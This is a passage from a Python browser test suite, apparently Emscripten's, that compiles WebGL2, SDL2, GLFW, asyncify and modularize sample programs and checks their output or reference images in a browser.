def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'])
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'])
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget.c'), args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-s', 'ASYNCIFY'])
@parameterized({
'': ([],),
'es6': (['-s', 'EXPORT_ES6=1'],),
})
def test_locate_file(self, args):
self.set_setting('EXIT_RUNTIME')
for wasm in [0, 1]:
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
shutil.move('test.data', Path('sub/test.data'))
self.run_browser('page.html', None, '/report_result?exit:0')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
self.run_browser('page.html', None, '/report_result?exit:' + expected)
in_html('0')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
return result;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_glalphatest(self):
self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = read_file('test.html')
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest_exit('browser/async.cpp', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest_exit('browser/async_longjmp.cpp', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
